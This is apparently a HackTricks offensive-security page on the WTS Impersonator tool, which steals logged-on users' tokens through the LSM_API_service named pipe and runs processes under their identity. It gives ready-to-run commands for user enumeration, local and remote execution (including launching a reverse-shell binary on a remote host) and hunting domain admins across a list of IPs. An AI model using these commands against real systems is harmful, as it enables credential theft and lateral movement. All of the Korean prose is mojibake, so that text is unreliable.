Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.
WTS Impersonator ๋๊ตฌ๋ โ\pipe\LSM_API_serviceโ RPC Named pipe๋ฅผ ์ด์ฉํ์ฌ ๋ก๊ทธ์ธํ ์ฌ์ฉ์๋ฅผ ์๋ฐํ๊ฒ ์ด๊ฑฐํ๊ณ ๊ทธ๋ค์ ํ ํฐ์ ํ์ทจํ์ฌ ์ ํต์ ์ธ Token Impersonation ๊ธฐ๋ฒ์ ์ฐํํฉ๋๋ค. ์ด ์ ๊ทผ ๋ฐฉ์์ ๋คํธ์ํฌ ๋ด์์ ์ํํ ์ธก๋ฉด ์ด๋์ ์ด์งํฉ๋๋ค. ์ด ๊ธฐ์ ์ ํ์ ์ Omri Baso์๊ฒ ๊ธฐ์ธํ๋ฉฐ, ๊ทธ์ ์์ ์ GitHub์์ ํ์ธํ ์ ์์ต๋๋ค.
Core Functionality
์ด ๋๊ตฌ๋ API ํธ์ถ์ ์ผ๋ จ์ ํตํด ์๋ํฉ๋๋ค:
WTSEnumerateSessionsA โ WTSQuerySessionInformationA โ WTSQueryUserToken โ CreateProcessAsUserW
์ฃผ์ ๋ชจ๋ ๋ฐ ์ฌ์ฉ๋ฒ
-
์ฌ์ฉ์ ์ด๊ฑฐ: ์ด ๋๊ตฌ๋ฅผ ์ฌ์ฉํ์ฌ ๋ก์ปฌ ๋ฐ ์๊ฒฉ ์ฌ์ฉ์ ์ด๊ฑฐ๊ฐ ๊ฐ๋ฅํฉ๋๋ค. ๊ฐ ์๋๋ฆฌ์ค์ ๋ํ ๋ช ๋ น์ ์ฌ์ฉํฉ๋๋ค:
-
๋ก์ปฌ์์:
.\WTSImpersonator.exe -m enum
- ์๊ฒฉ์ผ๋ก, IP ์ฃผ์ ๋๋ ํธ์คํธ ์ด๋ฆ์ ์ง์ ํ์ฌ:
.\WTSImpersonator.exe -m enum -s 192.168.40.131
-
๋ช ๋ น ์คํ:
exec๋ฐexec-remote๋ชจ๋์ ์๋ํ๊ธฐ ์ํด ์๋น์ค ์ปจํ ์คํธ๊ฐ ํ์ํฉ๋๋ค. ๋ก์ปฌ ์คํ์ WTSImpersonator ์คํ ํ์ผ๊ณผ ๋ช ๋ น๋ง ํ์ํฉ๋๋ค: -
๋ก์ปฌ ๋ช ๋ น ์คํ ์:
.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
- PsExec64.exe๋ฅผ ์ฌ์ฉํ์ฌ ์๋น์ค ์ปจํ ์คํธ๋ฅผ ์ป์ ์ ์์ต๋๋ค:
.\PsExec64.exe -accepteula -s cmd.exe
-
์๊ฒฉ ๋ช ๋ น ์คํ: PsExec.exe์ ์ ์ฌํ๊ฒ ์๊ฒฉ์ผ๋ก ์๋น์ค๋ฅผ ์์ฑํ๊ณ ์ค์นํ์ฌ ์ ์ ํ ๊ถํ์ผ๋ก ์คํํ ์ ์๊ฒ ํฉ๋๋ค.
-
์๊ฒฉ ์คํ ์:
.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
- ์ฌ์ฉ์ ํํ ๋ชจ๋: ์ฌ๋ฌ ์์คํ ์์ ํน์ ์ฌ์ฉ์๋ฅผ ๋์์ผ๋ก ํ์ฌ ๊ทธ๋ค์ ์๊ฒฉ ์ฆ๋ช ์ผ๋ก ์ฝ๋๋ฅผ ์คํํฉ๋๋ค. ์ด๋ ์ฌ๋ฌ ์์คํ ์์ ๋ก์ปฌ ๊ด๋ฆฌ์ ๊ถํ์ ๊ฐ์ง ๋๋ฉ์ธ ๊ด๋ฆฌ์๋ฅผ ํ๊ฒํ ํ๋ ๋ฐ ํนํ ์ ์ฉํฉ๋๋ค.
- ์ฌ์ฉ ์:
.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.


